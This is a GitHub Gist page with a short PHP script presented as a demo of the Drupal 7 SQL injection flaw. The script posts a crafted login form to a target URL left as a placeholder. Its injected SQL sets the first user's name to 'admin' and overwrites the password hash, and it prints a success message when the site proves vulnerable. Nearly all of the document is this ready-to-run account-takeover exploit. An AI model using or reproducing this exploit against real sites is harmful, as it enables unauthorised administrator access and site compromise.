-
-
Save jordanlgraham/ffe852c393dbc28536e801523dfabf7e to your computer and use it in GitHub Desktop.
Exploiting Drupal 7's SQL Injection vulnerability to change the admin user's password. http://milankragujevic.com/post/66
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /******************************************************** | |
| * Drupal 7 SQL Injection vulnerability demo | |
| * Created by Milan Kragujevic (of milankragujevic.com) | |
| * Read more at http://milankragujevic.com/post/66 | |
| * This will change the first user's username to admin | |
| * and their password to admin | |
| * Change $url to the website URL | |
| ********************************************************/ | |
| $url = '[URL HERE]'; // URL of the website (http://domain.com/) | |
| $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
| $params = array( | |
| 'http' => array( | |
| 'method' => 'POST', | |
| 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 'content' => $post_data | |
| ) | |
| ); | |
| $ctx = stream_context_create($params); | |
| $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
| if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { | |
| echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"; | |
| } else { | |
| echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment